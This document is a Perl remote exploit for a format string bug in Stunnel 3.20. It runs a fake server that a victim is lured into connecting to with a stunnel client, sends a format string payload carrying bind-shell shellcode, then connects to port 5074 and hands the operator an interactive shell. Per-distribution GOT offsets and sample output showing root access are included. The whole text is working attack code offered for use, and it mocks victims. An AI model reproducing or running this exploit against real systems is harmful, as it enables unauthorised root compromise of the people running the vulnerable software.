#!/usr/bin/perl ########################################################### # Stunnel version 3.20 remote exploit !!!. # # This is the old format string bug on stunnel # with automatized process. # The victim will connect on your fake server # and it ll try to give us a shell instantly. # Proof of Concept!! # Connect using this command ! # Send this command to the victim # stunnel -c -n smtp -r YOURIP:6666 # #[wsxz@localhost buffer]$ perl priv8tunnel.pl 1 6666 #Waiting for jackass to connect.... #[Jackass connected from localhost] #Sending evil string.... #Lets see if we got shell.... #Enjoy your stay on this server =) # #Linux localhost 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 i686 unknown unknown GNU/Linux #uid=0(root) gid=0(root) groups=0(root) ##################################################### use IO::Socket; use Net::hostent; $shellcode2 = #fork() and bind port 5074 by s0t4ipv6@shellcode.com.ar "\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01". "\xcd\x80\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40". "\x89\x45\x08\x8d\x4d\x08\xb0\x66\xcd\x80\x89\x45\x08\x43". "\x66\x89\x5d\x14\x66\xc7\x45\x16\x13\xd2\x31\xd2\x89\x55\x18". "\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10\xb0\x66\xcd\x80". "\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45\x0c". "\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80". "\x41\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68". "\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; if (@ARGV == 2) { $target = $ARGV[0]; $port = $ARGV[1]; }else{ printf("\n!! Priv8security.com Stunnel remote exploit !!\n"); printf(" usage: $0 target port\n"); printf(" Ex: perl $0 1 6666\n\n"); printf(" List of targets:\n"); printf(" 1 - Linux Mandrake 9.1 Stunnel 3.20\n"); printf(" 2 - Linux Mandrake 9.0 Stunnel 3.20\n"); printf(" 3 - Linux Redhat 7.3 Stunnel 3.20\n"); printf(" 4 - Linux Slackware 8.1 Stunnel 3.20\n\n"); exit(1); } if ( $target eq "1" ) { $retword = "\xf4\x23\x05\x08\xf6\x23\x05\x08"; #mister got vsnprintf | objdump -R ./stunnel |grep vsn $fmtstring = '%.48504x%4$hn%.11954x%3$hn'; } if ( $target eq "2" ) { $retword = "\xf8\x23\x05\x08\xfa\x23\x05\x08"; #mister got vsnprintf $fmtstring = '%.48504x%4$hn%.11954x%3$hn'; } if ( $target eq "3" ) { # $retword = "\x3c\x6b\x05\x08\x3e\x6b\x05\x08"; #mister .got exit $retword = "\xe8\x69\x05\x08\xea\x69\x05\x08";#mister got vsnprintf $fmtstring = '%.48504x%4$hn%.11950x%3$hn'; } if ( $target eq "4" ) { #$retword = "\x64\x5a\x05\x08\x66\x5a\x05\x08"; #mister .got exit $retword = "\xdc\x69\x05\x08\xde\x69\x05\x08";#mister got vsnprintf $fmtstring = '%.48504x%10$hn%.11550x%9$hn'; } if ( $target eq "5" ) { $retword = "\x14\x25\x05\x08\x16\x25\x05\x08"; #mister .got exit $fmtstring = '%.48504x%4\$hn%.11950x%3\$hn'; } $buffer .= $retword; $buffer .= "\x90" x (547 + 92 - length($shellcode2)); $buffer .= $shellcode2; $buffer .= $fmtstring; my $sock = new IO::Socket::INET (LocalPort => $port,Proto => 'tcp',Listen => 1,Reuse => 1); die "Could not create socket: $!\n" unless $sock; print "Waiting for jackass to connect....\n"; while (my $new_sock = $sock->accept()){ print $new_sock "$buffer\n"; $hostinfo = gethostbyaddr($new_sock->peeraddr); printf "[Jackass connected from %s]\n", $hostinfo->name || $new_sock->peerhost; print "Sending evil string....\n"; print "Lets see if we got shell....\n"; sleep(3); $handle = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$hostinfo->name,PeerPort=>5074,Type=>SOCK_STREAM,Reuse=>1) or die "No luck, try next time ok :-(\n"; print "Enjoy your stay on this server =)\n\n"; $handle->autoflush(1); print $handle "uname -a;id\n"; die "cant fork: $!" unless defined($kidpid = fork()); if ($kidpid) { # copy the socket to standard output while (defined ($line = <$handle>)) { print STDOUT $line; } kill("TERM", $kidpid); } # the else{} block runs only in the child process else { # copy standard input to the socket while (defined ($line = )) { print $handle $line; } } close($sock); }